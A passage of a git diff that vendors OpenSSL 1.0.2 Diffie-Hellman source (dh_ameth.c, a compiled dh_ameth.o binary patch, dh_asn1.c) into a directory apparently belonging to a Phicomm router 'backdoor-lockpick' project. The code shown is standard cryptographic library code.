+    if (EVP_CIPHER_asn1_to_param(kekctx, kekalg->parameter) <= 0)
+        goto err;
+
+    keylen = EVP_CIPHER_CTX_key_length(kekctx);
+    if (EVP_PKEY_CTX_set_dh_kdf_outlen(pctx, keylen) <= 0)
+        goto err;
+    /* Use OBJ_nid2obj to ensure we use built in OID that isn't freed */
+    if (EVP_PKEY_CTX_set0_dh_kdf_oid(pctx,
+                                     OBJ_nid2obj(EVP_CIPHER_type(kekcipher)))
+        <= 0)
+        goto err;
+
+    if (ukm) {
+        dukmlen = ASN1_STRING_length(ukm);
+        dukm = BUF_memdup(ASN1_STRING_data(ukm), dukmlen);
+        if (!dukm)
+            goto err;
+    }
+
+    if (EVP_PKEY_CTX_set0_dh_kdf_ukm(pctx, dukm, dukmlen) <= 0)
+        goto err;
+    dukm = NULL;
+
+    rv = 1;
+ err:
+    if (kekalg)
+        X509_ALGOR_free(kekalg);
+    if (dukm)
+        OPENSSL_free(dukm);
+    return rv;
+}
+
+static int dh_cms_decrypt(CMS_RecipientInfo *ri)
+{
+    EVP_PKEY_CTX *pctx;
+    pctx = CMS_RecipientInfo_get0_pkey_ctx(ri);
+    if (!pctx)
+        return 0;
+    /* See if we need to set peer key */
+    if (!EVP_PKEY_CTX_get0_peerkey(pctx)) {
+        X509_ALGOR *alg;
+        ASN1_BIT_STRING *pubkey;
+        if (!CMS_RecipientInfo_kari_get0_orig_id(ri, &alg, &pubkey,
+                                                 NULL, NULL, NULL))
+            return 0;
+        if (!alg || !pubkey)
+            return 0;
+        if (!dh_cms_set_peerkey(pctx, alg, pubkey)) {
+            DHerr(DH_F_DH_CMS_DECRYPT, DH_R_PEER_KEY_ERROR);
+            return 0;
+        }
+    }
+    /* Set DH derivation parameters and initialise unwrap context */
+    if (!dh_cms_set_shared_info(pctx, ri)) {
+        DHerr(DH_F_DH_CMS_DECRYPT, DH_R_SHARED_INFO_ERROR);
+        return 0;
+    }
+    return 1;
+}
+
+static int dh_cms_encrypt(CMS_RecipientInfo *ri)
+{
+    EVP_PKEY_CTX *pctx;
+    EVP_PKEY *pkey;
+    EVP_CIPHER_CTX *ctx;
+    int keylen;
+    X509_ALGOR *talg, *wrap_alg = NULL;
+    ASN1_OBJECT *aoid;
+    ASN1_BIT_STRING *pubkey;
+    ASN1_STRING *wrap_str;
+    ASN1_OCTET_STRING *ukm;
+    unsigned char *penc = NULL, *dukm = NULL;
+    int penclen;
+    size_t dukmlen = 0;
+    int rv = 0;
+    int kdf_type, wrap_nid;
+    const EVP_MD *kdf_md;
+    pctx = CMS_RecipientInfo_get0_pkey_ctx(ri);
+    if (!pctx)
+        return 0;
+    /* Get ephemeral key */
+    pkey = EVP_PKEY_CTX_get0_pkey(pctx);
+    if (!CMS_RecipientInfo_kari_get0_orig_id(ri, &talg, &pubkey,
+                                             NULL, NULL, NULL))
+        goto err;
+    X509_ALGOR_get0(&aoid, NULL, NULL, talg);
+    /* Is everything uninitialised? */
+    if (aoid == OBJ_nid2obj(NID_undef)) {
+        ASN1_INTEGER *pubk;
+        pubk = BN_to_ASN1_INTEGER(pkey->pkey.dh->pub_key, NULL);
+        if (!pubk)
+            goto err;
+        /* Set the key */
+
+        penclen = i2d_ASN1_INTEGER(pubk, &penc);
+        ASN1_INTEGER_free(pubk);
+        if (penclen <= 0)
+            goto err;
+        ASN1_STRING_set0(pubkey, penc, penclen);
+        pubkey->flags &= ~(ASN1_STRING_FLAG_BITS_LEFT | 0x07);
+        pubkey->flags |= ASN1_STRING_FLAG_BITS_LEFT;
+
+        penc = NULL;
+        X509_ALGOR_set0(talg, OBJ_nid2obj(NID_dhpublicnumber),
+                        V_ASN1_UNDEF, NULL);
+    }
+
+    /* See if custom paraneters set */
+    kdf_type = EVP_PKEY_CTX_get_dh_kdf_type(pctx);
+    if (kdf_type <= 0)
+        goto err;
+    if (!EVP_PKEY_CTX_get_dh_kdf_md(pctx, &kdf_md))
+        goto err;
+
+    if (kdf_type == EVP_PKEY_DH_KDF_NONE) {
+        kdf_type = EVP_PKEY_DH_KDF_X9_42;
+        if (EVP_PKEY_CTX_set_dh_kdf_type(pctx, kdf_type) <= 0)
+            goto err;
+    } else if (kdf_type != EVP_PKEY_DH_KDF_X9_42)
+        /* Unknown KDF */
+        goto err;
+    if (kdf_md == NULL) {
+        /* Only SHA1 supported */
+        kdf_md = EVP_sha1();
+        if (EVP_PKEY_CTX_set_dh_kdf_md(pctx, kdf_md) <= 0)
+            goto err;
+    } else if (EVP_MD_type(kdf_md) != NID_sha1)
+        /* Unsupported digest */
+        goto err;
+
+    if (!CMS_RecipientInfo_kari_get0_alg(ri, &talg, &ukm))
+        goto err;
+
+    /* Get wrap NID */
+    ctx = CMS_RecipientInfo_kari_get0_ctx(ri);
+    wrap_nid = EVP_CIPHER_CTX_type(ctx);
+    if (EVP_PKEY_CTX_set0_dh_kdf_oid(pctx, OBJ_nid2obj(wrap_nid)) <= 0)
+        goto err;
+    keylen = EVP_CIPHER_CTX_key_length(ctx);
+
+    /* Package wrap algorithm in an AlgorithmIdentifier */
+
+    wrap_alg = X509_ALGOR_new();
+    if (!wrap_alg)
+        goto err;
+    wrap_alg->algorithm = OBJ_nid2obj(wrap_nid);
+    wrap_alg->parameter = ASN1_TYPE_new();
+    if (!wrap_alg->parameter)
+        goto err;
+    if (EVP_CIPHER_param_to_asn1(ctx, wrap_alg->parameter) <= 0)
+        goto err;
+    if (ASN1_TYPE_get(wrap_alg->parameter) == NID_undef) {
+        ASN1_TYPE_free(wrap_alg->parameter);
+        wrap_alg->parameter = NULL;
+    }
+
+    if (EVP_PKEY_CTX_set_dh_kdf_outlen(pctx, keylen) <= 0)
+        goto err;
+
+    if (ukm) {
+        dukmlen = ASN1_STRING_length(ukm);
+        dukm = BUF_memdup(ASN1_STRING_data(ukm), dukmlen);
+        if (!dukm)
+            goto err;
+    }
+
+    if (EVP_PKEY_CTX_set0_dh_kdf_ukm(pctx, dukm, dukmlen) <= 0)
+        goto err;
+    dukm = NULL;
+
+    /*
+     * Now need to wrap encoding of wrap AlgorithmIdentifier into parameter
+     * of another AlgorithmIdentifier.
+     */
+    penc = NULL;
+    penclen = i2d_X509_ALGOR(wrap_alg, &penc);
+    if (!penc || !penclen)
+        goto err;
+    wrap_str = ASN1_STRING_new();
+    if (!wrap_str)
+        goto err;
+    ASN1_STRING_set0(wrap_str, penc, penclen);
+    penc = NULL;
+    X509_ALGOR_set0(talg, OBJ_nid2obj(NID_id_smime_alg_ESDH),
+                    V_ASN1_SEQUENCE, wrap_str);
+
+    rv = 1;
+
+ err:
+    if (penc)
+        OPENSSL_free(penc);
+    if (wrap_alg)
+        X509_ALGOR_free(wrap_alg);
+    return rv;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_ameth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_ameth.o
new file mode 100644
index 0000000000000000000000000000000000000000..b43846e5354c9d8d1039a1f4b276b070240af69f
GIT binary patch
literal 19288
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
Xg=M$j*$}H(f2FMdS$Qe_wb%b&!`0cv

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_asn1.c
new file mode 100644
index 0000000..f470214
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_asn1.c
@@ -0,0 +1,189 @@
+/* dh_asn1.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/dh.h>
+#include <openssl/objects.h>
+#include <openssl/asn1t.h>
+
+/* Override the default free and new methods */
+static int dh_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                 void *exarg)
+{
+    if (operation == ASN1_OP_NEW_PRE) {
+        *pval = (ASN1_VALUE *)DH_new();
+        if (*pval)
+            return 2;
+        return 0;
+    } else if (operation == ASN1_OP_FREE_PRE) {
+        DH_free((DH *)*pval);
+        *pval = NULL;
+        return 2;
+    }
+    return 1;
+}
+
+ASN1_SEQUENCE_cb(DHparams, dh_cb) = {
+        ASN1_SIMPLE(DH, p, BIGNUM),
+        ASN1_SIMPLE(DH, g, BIGNUM),
+        ASN1_OPT(DH, length, ZLONG),
+} ASN1_SEQUENCE_END_cb(DH, DHparams)
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(DH, DHparams, DHparams)
+
+/*
+ * Internal only structures for handling X9.42 DH: this gets translated to or
+ * from a DH structure straight away.
+ */
+
+typedef struct {
+    ASN1_BIT_STRING *seed;
+    BIGNUM *counter;
+} int_dhvparams;
+
+typedef struct {
+    BIGNUM *p;
+    BIGNUM *q;
+    BIGNUM *g;
+    BIGNUM *j;
+    int_dhvparams *vparams;
+} int_dhx942_dh;
+
+ASN1_SEQUENCE(DHvparams) = {
+        ASN1_SIMPLE(int_dhvparams, seed, ASN1_BIT_STRING),
+        ASN1_SIMPLE(int_dhvparams, counter, BIGNUM)
+} ASN1_SEQUENCE_END_name(int_dhvparams, DHvparams)
+
+ASN1_SEQUENCE(DHxparams) = {
+        ASN1_SIMPLE(int_dhx942_dh, p, BIGNUM),
+        ASN1_SIMPLE(int_dhx942_dh, g, BIGNUM),
+        ASN1_SIMPLE(int_dhx942_dh, q, BIGNUM),
+        ASN1_OPT(int_dhx942_dh, j, BIGNUM),
+        ASN1_OPT(int_dhx942_dh, vparams, DHvparams),
+} ASN1_SEQUENCE_END_name(int_dhx942_dh, DHxparams)
+
+int_dhx942_dh *d2i_int_dhx(int_dhx942_dh **a,
+                           const unsigned char **pp, long length);
+int i2d_int_dhx(const int_dhx942_dh *a, unsigned char **pp);
+
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_const_fname(int_dhx942_dh, DHxparams, int_dhx)
+
+/* Application leve function: read in X9.42 DH parameters into DH structure */
+
+DH *d2i_DHxparams(DH **a, const unsigned char **pp, long length)
+{
+    int_dhx942_dh *dhx = NULL;
+    DH *dh = NULL;
+    dh = DH_new();
+    if (!dh)
+        return NULL;
+    dhx = d2i_int_dhx(NULL, pp, length);
